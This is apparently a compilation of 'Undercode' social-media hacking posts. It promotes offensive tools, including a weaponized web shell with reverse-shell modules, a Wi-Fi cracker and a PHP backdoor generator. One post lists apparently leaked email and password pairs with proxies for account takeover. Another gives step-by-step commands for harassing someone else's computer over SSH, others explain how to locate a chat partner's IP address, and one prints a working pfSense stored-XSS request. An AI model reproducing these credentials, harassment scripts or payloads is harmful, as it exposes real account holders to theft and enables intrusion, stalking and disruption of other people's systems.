▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated A powerful and useful hacker dictionary builder for a brute-force attack
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone --depth=1 --branch=master https://www.github.com/landgrey/

2) pydictor.git

3) cd pydictor/

4) chmod +x pydictor.py

5) python pydictor.py

🦑 EXAMPLE USAGE :

type wordlist identifier description supported function
core base C1 basic wordlist F1 F2 F3 F4
core char C2 custom character wordlist F1 F2 F3 F4
core chunk C3 permutation and combination wordlist ALL
core conf C4 based on configuration file wordlist ALL
core extend C5 extend wordlist based on rules ALL
core sedb C6 social engineering wordlist ALL
tool combiner T1 combine the specify directory files tool
tool comparer T2 compare two file content difference tool ALL
tool counter T3 word frequency count tool ALL
tool handler T4 handle the input file tool ALL
tool uniqbiner T5 combine and unique the directory files tool ALL
tool uniqifer T6 unique the input file tool ALL
tool hybrider T7 hybrid couples word list tool F1 F2 F3 F4

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
pinterest.com/undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Ubuntu

Press [CTRL][ALT][T] to open a command window and run the following command to install the libraries:

sudo apt-get install python python-wxgtk3.0 rtl-sdr

Install the software using:

sudo pip install -U rtlsdr_scanner

Now you should be able to run the program:

python -m rtlsdr_scanner

2) Windows

To see if it's working open a command prompt.

Then run:

rtl_test

You should see an output similar to this:

Found 1 device(s):
0: PROlectrix DV107669

Using device 0: PROlectrix DV107669
Found Fitipower FC0012 tuner
Supported gain values (5): -9.9 -4.0 7.1 17.9 19.2

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.

Reading samples in async mode...
lost at least 12 bytes

If so your dongle and driver are now fully installed.

Potential Errors

'rtl_test' is not recognized as an internal or external command, operable program or batch file.
If you used the installer, first change to the installation directory, otherwise you're PATH hasn't been set properly, try step 2 again.
rtl_test reports 'No supported devices found.'
The driver has not been installed, try steps 3 to 7 again.
rtl_test keeps repeating 'lost at least'
Your machine may be too slow, try closing other programs and plug the dongle into a different USB port.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Weaponized web shell Termux :
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/epinna/weevely3

2) cd weevely3

3) run as python
weevely generate <password> <path>
weevely <URL> <password> [cmd]

🦑Module Description
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_phpconf Audit PHP configuration.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
:shell_php Execute PHP commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_gzip Compress or expand gzip files.
:file_clearlog Remove string from a file.
:file_check Get attributes and permissions of a file.
:file_upload Upload file to remote filesystem.
:file_webdownload Download an URL.
:file_tar Compress or expand tar archives.
:file_download Download file from remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_edit Edit remote file on a local editor.
:file_grep Print lines matching a pattern in multiple files.
:file_ls List directory content.
:file_cp Copy single file.
:file_rm Remove remote file.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Complet termux wifi hacking tool
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

1) WPS: The Offline Pixie-Dust attack

2) WPS: The Online Brute-Force PIN attack

3) WPA: The WPA Handshake Capture + offline crack.

4) WPA: The PMKID Hash Capture + offline crack.

5) WEP: Various known attacks against WEP, including fragmentation, chop-chop, aireplay, etc.

6) Run wifite, select your targets, and Wifite will automatically start trying to capture or crack the password.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/derv82/wifite2.git

2) cd wifite2

3) sudo ./Wifite.py

🦑To install onto your computer (so you can just run wifite from any terminal), run:

1) sudo python setup.py install
This will install wifite to /usr/sbin/wifite which should be in your terminal path.

Note: Uninstalling is not as easy. The only way to uninstall is to record the files installed by the above command and remove those files:

2) sudo python setup.py install --record files.txt \
&& cat files.txt | xargs sudo rm \
&& rm -f files.txt

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
t.me/undercodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/Dionach/CMSmap
Then you need to configure the edbtype and edbpath settings in the cmsmap.conf. Use GIT if you have a local Git repository of Exploit-db :

2) [exploitdb]
edbtype = GIT
edbpath = /opt/exploitdb/

3) Alternatively, use APT if you have installed the debian exploitdb package. For Kali, use the following settings :

[exploitdb]
edbtype = APT
edbpath = /usr/share/exploitdb/

4) If you would like to run cmsmap from anywhere in your system you can install it with pip3 :

>cd CMSmap

>pip3 install .

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New acounts- Login With given Proxies Express Vpn Tested :
t.me/undercodeTesting



rodrigozepeda55@gmail.com:267165Rz, Account is Valid. Try logging in App to find out Status., Proxy: 113.166.121.42:4145

matt_lee88@hotmail.com:donkeytea88, Account is Valid. Try logging in App to find out Status., Proxy: 213.32.48.42:52576

ethanbco@gmail.com:hannah@68, Account is Valid. Try logging in App to find out Status.Proxy: 180.92.233.82:4145

mduboef@aol.com:zzzzzz10, Account is Valid. Try logging in App to find out Status. Proxy: 195.206.4.16:48006

grahamrgreenhill@gmail.com:4288Michelle!, Account is Valid. Try logging in App to find out Status. Proxy: 167.99.72.55:8080

stressedcorgi58@gmail.com:Sueshe123, Account is Valid. Try logging in App to find out Status., Proxy: 190.196.20.166:44907

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Premium Proxies _New :

195.158.109.248:50330 elite Apr-12, 10:25 Malta Valletta GO P.L.C.
187.188.182.107:43687 elite Apr-13, 01:23 Mexico Chetumal Iusacell
41.73.128.190:36226 elite Apr-12, 12:28 Nigeria Lagos IS InternetSolu...
217.64.109.231:45282 elite Apr-12, 22:21 Mali Bamako SOTELMA
41.217.219.53:31398 elite Apr-12, 04:12 Malawi Skyband Corpora...
41.217.217.60:36120 elite Apr-12, 22:17 Malawi Skyband Corpora...
41.87.29.130:8080 elite Apr-12, 19:11 Malawi Malawi Telecomm...
146.255.68.166:51329 elite Apr-13, 00:14 Macedonia Skopje Telesmart Telek...
94.242.213.33:8118 elite Apr-12, 10:10 Luxembourg root SA
92.114.234.206:46685 elite Apr-12, 22:27 Moldova, Republic of Chisinau Moldtelecom SA
202.131.234.142:51702 elite Apr-12, 12:10 Mongolia Mobinet LLC
202.179.7.182:56506 elite Apr-12, 19:09 Mongolia Mongolia Telecom
155.93.108.170:30348 elite Apr-12, 06:00 Nigeria Lagos
196.1.184.6:52963 elite Apr-13, 01:04 Nigeria Lagos Nigerian Teleco...
165.98.53.38:35332 elite Apr-12, 18:57 Nicaragua Centro De Admin...
114.134.172.50:60664 elite Apr-12, 19:08 New Zealand Auckland New Zealand Tec...
134.19.181.28:80 elite Apr-13, 00:37 Netherlands Hilversum Global Layer B.V.
202.166.207.195:8080 elite Apr-12, 21:24 Nepal Kathmandu SingNet Pte

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best 2020 Tempory Mail-No Login Required :
pinterest.com/undercode_Testing



http://www.20minutemail.com/

https://burnermail.io/

http://10minutemail.com/10MinuteMail/error.html

https://www.spamgourmet.com/index.pl

http://www.yopmail.com/en/

http://boun.cr/

https://tempmailo.com/

https://www.guerrillamail.com/

https://getnada.com/

http://temp-mail.org/

http://generator.email/

https://maildrop.cc/

http://www.e4ward.com/

http://www.throwawaymail.com/

http://mailinator.com/

https://mytemp.email/

https://tempemailco.com/

https://grouplist.io/

https://www.crazymailing.com/

https://mailtemp.top/

https://www.guerrillamail.com/

https://www.emailondeck.com/

https://ihazspam.ca/

http://www.fakemailgenerator.com/

https://10minutemail.net/

https://tempmail.io/

http://getairmail.com/

http://mailnull.com/


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ACCESS ANY PC VIA HACK SSH Full by Undercode :
What can I do on someone else’s PC using SSH ?
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

STEP1:
1) Configure Access and Launch Basic Applications
First you need to register a command so that everything we do appears on the remote computer that we logged in through SSH, and not on the local computer on which we logged in. Configure the display path with the following command:

export DISPLAY =: 0.0
Now, by writing a simple firefox command via SSH, you will open a Firefox browser window on the remote computer.

2) But for our first example, let's open the xterm window , displaying network data that looks pretty troubling for a beginner. To make the situation worse, we will do it 10 times. Accordingly, there will be 10 open windows.

4) To do this, we will execute the command in a loop:

for i in {1..10}; do sudo xterm -maximize -e sudo tcpdump; done
In this case, we open the terminal window of the maximum size, and the -e command means that we execute sudo tcpdump in the xterm window that we run.


Step 2 - Calling, Whistling and Speech

1) Before we can reproduce any noise, we need to execute the following command in order to be able to control the speakers remotely.

2) sudo modprobe pcspkr
Now we have many options! First, we can say any phrase through the computer using the say or espeak command .

> say "I am a canadian randomware, I have not encrypted any files but would appreciate some change"
espeak "please give me quarters sorry to bother you"
We can schedule such messages so that they periodically go to chrontab.

4) We can use the beep to drive the user crazy. To use beep , install it with > apt install beep .

🦑 After installation, look at the manual using man beep to evaluate its capabilities:

BEEP(1) General Commands Manual BEEP(1)

NAME
beep - beep the pc speaker any number of ways

SYNOPSIS
beep [--verbose | --debug] [-e device | --device device] [-f
N] [-l N] [-r N] [-d N] [-D N] [-s] [-c]

beep [ OPTIONS ] [-n] [--new] [ OPTIONS ]

beep [-h] [--help]

beep [-v] [-V] [--version]

🦑 We can generate almost any noise with Beep. The following table with frequencies may come in handy:

Note Frequency
C 261.6
C# 277.2
D 293.7
D# 311.1
E 329.6
F 349.2
F# 370.0
G 392.0
G# 415.3
A 440.0
A# 466.2
B 493.9
C 523.2

🦑Step 3 - Awesome Error Messages
Confusing or disturbing error messages is fun, as users usually trust them until they become too absurd. Such messages can be completely different.

> We can call small messages using the notify-send command , with the header and body of the message.

>notify-send 'WARNING' 'I AM CALLING THE INTERNET POLICE'
This message will pop up in the corner. Kinda boring. Instead, we can display a large bold alarm message with the whiptail command and run it in a full-screen window.

xterm -maximized -fullscreen -fa 'Monospace' -fs 19.31 -e whiptail --title "CRITICAL: ACTION CANNOT BE UNDONE" --msgbox "UNAUTHORIZED LOGIN! DATA SAFEGUARD SYSTEM WILL DESTROY THIS TERMINAL IN 10 SECONDS, STAY 30 FEET CLEAR TO AVOID BLAST" --topleft 23 79
You can replace it with your own message, this is how it will look.

Step 4 - Cron Tasks from Hell
Now we can start combining tasks and plan their automatic launch. We can check if there are any existing jobs in crontab with the -l flag, and then add a new job with the -e flag.

crontab -l
crontab -e
In the configuration window that opens, you can add a task for execution every 60 seconds according to the following formula.

* * * * * (your code here)
In order for the computer to beep every 60 seconds, we can add this record and then press ctrl x and y to save the file.

> hack any pc using ssh part 2>

* * * * * beep -f 300.7 -r 10 -d 50 -l 400
As soon as the file is saved, the computer will emit a sound signal with the given parameters every 60 seconds.

🦑 Step 5 - Completing Custom Tasks

1) If you have access to someone else’s computer using SSH, you can turn off any running process. This will lead to a sudden stop of the used application, and accordingly, the user will not be able to effectively use the computer. To find the process ID, we can use the top or htop commands . If you do not have htop installed , you can do this with the command below.

> apt install htop

🦑TASK :
1)
Tasks: 219 total, 1 running, 178 sleeping, 0 stopped, 0 zombie
%Cpu(s): 3.0 us, 0.4 sy, 0.0 ni, 95.6 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4968836 total, 1431244 free, 1104324 used, 2433268 buff/cache
KiB Swap: 5138428 total, 5138428 free, 0 used. 3367804 avail Mem

2) Take a random beep and combine it with some bash commands to create many Firefox browser windows that open every 60 seconds and go to “Never Gonna Give You Up.”

3) for i in {1..10}; do beep -f 4000 -D 500 -l 1000 -r 10 & firefox -new-window

USE FOR LEARN NOT FOR HARM

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Use the netstat command to quickly find the other party's IP address
> Use the built-in network command netstat in the Windows system to quickly find out the IP address of the friend of the other party. The specific operations are as follows:
fb.com/undercodeTesting


1) Click the <Start> button, execute the <Run> command in the pop-up shortcut menu, the <Run> dialog box pops up, enter the cmd command, and click the <OK> button to open the <Command Prompt> window. (I do n’t want to take screenshots when I turn on the computer lazily)


2) Find a xy friend or WeChat friend, open the chat window with them, and then send a picture to the other party.

3) At this time, enter the netstat -n command in the <Command Prompt> window and execute it. In the running result, you can see which addresses are currently connected to the local computer. If the status of a corresponding connection is ESTABLISHED, it indicates that the connection between the local computer and the opposite computer is successful, and the returned information is as follows.


4) as example after sending,
there are four successful connections. Among them, the host that opens the 80-port service is the QQ server, namely the two IP addresses 106.120.165.244 and 101.199.97.107.

5) Now, open a query website and query the IP address 106.120.165.244. You can see that the information of the other party has been successfully queried. The other IP address is exclusive to Qihoo after query. For example, positioning, recommending whatismyip is a smaller scope


🦑 Attachment: The netstat command is mainly used to display network connection information. It is a very useful tool for monitoring TCP / IP networks. It can let users know which network connections are currently in the system.

1) Enter netstat / in the <Command Prompt> window , You can get help information for this command.

-a or --all: display all connected sockets;

-A <network type> or-<network type>: list related addresses in the connection of this network type;

-c or --continuous: continuously list the network status;

-C or --cache: display the cache information of the router configuration;

-e or --extend: display other related information of the network;

-F or --fib: display FIB;

-g or --groups: display the list of group members with multiple broadcast functions;

-h or --help: online help;

-i or --interfaces: display the web interface information form;

-l or --listening: display the socket of the server under monitoring;

-M or --masquerade: display disguised network connection;



-n or --numeric: use the IP address directly without going through the domain name server;

-N or --netlink or --symbolic: display the symbolic connection name of the network hardware peripheral devices;

-o or --timers: display timer;

-p or --programs: display the program identification code and program name of the socket being used;

-r or --route: display Routing Table;

-s or --statistice: display network work information statistics table;

-t or --tcp: display the connection status of TCP transmission protocol;

-u or --udp: display the connection status of UDP transmission protocol;

-v or --verbose: display the command execution process;

-V or --version: display version information;

-w or --raw: display the connection status of RAW transfer protocol;

-x or --unix: The effect of this parameter is the same as specifying the "-A unix" parameter;

--ip or --inet: The effect of this parameter is the same as specifying the "-A inet" parameter.

2) Know how to lose the above command! ! ! It is netstat -n! ! !


🦑 Also! The command syntax information is as follows:

NETSTAT [-a] [-n] and so on

Do n’t do bad things for fun

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tracking
> Pseudo-hackers must know skills: query the other party's IP address and determine the true geographic location
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Preparation:

In order to query the other party's IP address and real geographic location, we need to use the " IP radar " software, which has: query which URLs you have visited, the IP address of its URLs, geographic location and website domain name, as well as access procedures, access Time, the number of bytes transferred, which programs are reading and writing your hard drive and other functions.

> Support system: WinXP / Win2003 / Vista / Win7 / Win8

🦑 Second, the query method:

1) After downloading the "IP Radar", directly decompress it and double-click to run.


2) After turning on the radar, make the "IP radar" in the running monitoring state, and then open the QQ chat window to chat with friends who want to obtain the IP address and real geographic location. Try to send the other party some large file messages such as pictures or music.

3) Then check in the "IP Radar" program, find the column where the "QQ.exe" program is located, and then double-click the column, it will open the "QQ.rxr" program to access the network details.

4) In the pop-up message box, you can find the other party's QQ IP address and geographic location information.

5) If you are afraid that the geographic location provided by "IP Radar" is not accurate enough, you can also directly enter the IP address into the search box of the search engine and click search to find the geographic location of the IP!

6) Get the download address of "IP Radar" , please search for " computer those things " in WeChat to follow our official public account, and reply to " IP Radar " to receive push messages!

Do n’t worry about computer freezes or problems. Pay attention to the WeChat public account of “ the computer ’s things ” (computer system, software application and other problems are all acceptable ) .

> This A simple process by tracking by app, will send more for ip tracking..

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The password is set to a universal, easy to remember, but often heard of "crash library" and other cases, breaking the password of a website, all network information is all transparent; password settings are complex and different, for a long time, I forget What password, every time you log in to retrieve the password will waste half a day. The problem of setting a password seems to be simple, but it somewhat troubles our daily life.

2) We do n’t have time to read through cryptography-related professional skills in order to set up a password, and we do n’t want to be easily obtained by those who have misconducted our network information. A simple trick can deal with it. In the process of setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and generally requires 6 digits and more than 8 digits. Then we set the password best to think according to this standard.


🦑 1) The first step is to think of a set of basic codes. It can be a number, a spelling of a name, or an abbreviation of an aphorism, such as: every day upwards-corresponding to "TTXS" or lowercase "ttxs" or 4463 (stroke for each word),

2) The second step is to add a personality classification based on the basic code. For example, the account number related to finance is defined as: FINA or fa, and the definition of non-financial category is: Game, which can be defined by yourself.

3) The third step is to add tags for each website. For example, today's headline: can be identified as TT (the first letter of the headline)

4) Then combine these into a complex and memorable password rule: personality classification + basic code + website mark (location can be changed at will: basic code + personality classification + website mark ) For example: today ’s headline password is OK Set to: fa4463TT (accounts related to finance, the number of strokes every day, the first letter of the headline); the password of Weibo can be set to: Game4463wb (non-financial account, the number of strokes every day, the first of Weibo Abbreviations) We only need to remember our own coding rules.

5) The above method can set up different complex and regular easy-to-remember password series. Don't worry about your password being stolen on a computer or a small book, and don't be afraid that the "crash library" method can easily steal your password, and you don't have to waste time to retrieve the password frequently.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr


# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.


POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d

🦑 __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save


🦑Please USE FOR LEARN NOT FOR STEAL »

@UNDERCODEOFFICIAL
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Why KillShot ?

You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

Linux Setup
1) git clone https://github.com/bahaabdelwahed/killshot

2) cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb

> Windows Setup

1) Download ruby for windows ==> https://rubyinstaller.org/downloads/

2) Download Cmder here ==> http://cmder.net/

3) Download Curl For 64/32 ==> https://curl.haxx.se/windows/

4) Download nmap ==> https://nmap.org/download.html
Enjoy !


🦑FEATURES :
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDB Scan
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 - Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
twitter.com/undercodeNews

🦑 FEATURES :


1) Multi-architectures: Arm, Arm64 (Armv8), BPF, Ethereum Virtual Machine, M68K, M680X, Mips, MOS65XX, PowerPC, RISCV, Sparc, SystemZ, TMS320C64X, Web Assembly, XCore & X86 (include X86_64) (details).

2) Clean/simple/lightweight/intuitive architecture-neutral API.

3) Provide details on disassembled instruction (called “decomposer” by some others).

4) Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.

5) Implemented in pure C language, with bindings for D, Clojure, F#,
6) Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala available.

7) Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).

8) Thread-safe by design.

9) Special support for embedding into firmware or OS kernel.

10) High performance & suitable for malware analysis (capable of handling various X86 malware tricks).

11) Distributed under the open source BSD license.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


Debian/Ubuntu Linux - core engine
NOTE: At the moment only version 2.1.2 is available in Ubuntu/Debian repositories. Version 3.0.4 will be provided later.

Capstone is available in Ubuntu & Debian Linux (testing/sid flavours). Binary package of the core of Capstone can be installed with:

1) $ sudo apt-get install libcapstone2
To write your own tools with Capstone, install the development package with:

2) $ sudo apt-get install libcapstone-dev
2.2 Mac OSX - core engine
Macport users can install the core of Capstone with:

3(3) $ sudo port install capstone
Note that Macport installs libraries into its own directory, so you need to tell applications where to find them, for example with:

4) $ export DYLD_LIBRARY_PATH=/opt/local/lib/:$DYLD_LIBRARY_PATH
Homebrew users can install the core of Capstone with:

5) $ brew install capstone
Note that Homebrew installs libraries into its own directory, so you need to tell applications where to find them, for example with:

6) $ export DYLD_LIBRARY_PATH=/usr/local/opt/capstone/lib/:$DYLD_LIBRARY_PATH

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁